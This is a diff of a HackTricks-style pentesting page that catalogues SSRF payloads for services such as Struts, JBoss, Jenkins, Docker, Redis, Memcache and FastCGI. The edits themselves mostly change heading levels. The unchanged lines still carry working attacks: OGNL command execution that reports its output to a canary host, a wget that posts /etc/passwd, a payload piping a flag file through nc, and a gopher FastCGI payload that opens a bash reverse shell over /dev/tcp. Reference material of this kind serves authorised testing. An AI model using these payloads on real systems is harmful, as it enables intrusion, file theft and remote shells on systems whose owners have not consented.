?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
|
||||
```
|
||||
|
||||
# JBoss
|
||||
## JBoss
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -298,7 +293,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
|
||||
```
|
||||
|
||||
# Confluence
|
||||
## Confluence
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -316,7 +311,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
|
||||
```
|
||||
|
||||
# Jira
|
||||
## Jira
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -336,7 +331,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
|
||||
```
|
||||
|
||||
# Other Atlassian Products
|
||||
## Other Atlassian Products
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -354,7 +349,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
|
||||
```
|
||||
|
||||
# OpenTSDB
|
||||
## OpenTSDB
|
||||
|
||||
**Commonly bound port: 4242**
|
||||
|
||||
|
@ -374,7 +369,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
|
||||
```
|
||||
|
||||
# Jenkins
|
||||
## Jenkins
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8888**
|
||||
|
||||
|
@ -402,7 +397,7 @@ pay = 'public class x {public x(){"%s".execute()}}' % cmd
|
|||
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
|
||||
```
|
||||
|
||||
# Hystrix Dashboard
|
||||
## Hystrix Dashboard
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080**
|
||||
|
||||
|
@ -414,7 +409,7 @@ Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1
|
|||
/proxy.stream?origin=http://SSRF_CANARY/
|
||||
```
|
||||
|
||||
# W3 Total Cache
|
||||
## W3 Total Cache
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL)**
|
||||
|
||||
|
@ -454,7 +449,7 @@ echo($req);
|
|||
?>
|
||||
```
|
||||
|
||||
# Docker
|
||||
## Docker
|
||||
|
||||
**Commonly bound ports: 2375, 2376 (SSL)**
|
||||
|
||||
|
@ -479,7 +474,7 @@ Content-Type: application/json
|
|||
|
||||
Replace alpine with an arbitrary image you would like the docker container to run.
|
||||
|
||||
# Gitlab Prometheus Redis Exporter
|
||||
## Gitlab Prometheus Redis Exporter
|
||||
|
||||
**Commonly bound ports: 9121**
|
||||
|
||||
|
@ -493,11 +488,11 @@ The following endpoint will allow an attacker to dump all the keys in the redis
|
|||
http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
|
||||
```
|
||||
|
||||
***
|
||||
|
||||
|
||||
**Possible via Gopher**
|
||||
|
||||
# Redis
|
||||
## Redis
|
||||
|
||||
**Commonly bound port: 6379**
|
||||
|
||||
|
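Review bot: after the Redis-exporter code fence this hunk leaves `***`, a blank line, and the bold label **Possible via Gopher** immediately before `## Redis`; placed there, the label is orphaned above the heading it describes. Move it (or the `***` rule) below `## Redis` and its port line so it attaches to the Redis section, and "Commonly bound ports: 9121" lists a single port and should say "port".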
@ -609,7 +604,7 @@ While this required authenticated access to GitLab to exploit, I am including th
|
|||
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
|
||||
```
|
||||
|
||||
# Memcache
|
||||
## Memcache
|
||||
|
||||
**Commonly bound port: 11211**
|
||||
|
||||
|
@ -622,7 +617,7 @@ gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:
|
|||
gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
|
||||
```
|
||||
|
||||
# Apache Tomcat
|
||||
## Apache Tomcat
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -634,7 +629,7 @@ CTF writeup using this technique:
|
|||
|
||||
[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
|
||||
|
||||
# FastCGI
|
||||
## FastCGI
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL)**
|
||||
|
||||
|
@ -644,7 +639,7 @@ This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/).
|
|||
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
|
||||
```
|
||||
|
||||
# Java RMI
|
||||
## Java RMI
|
||||
|
||||
**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
|
||||
|
||||
|
@ -659,21 +654,14 @@ $ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.n
|
|||
[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...]
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|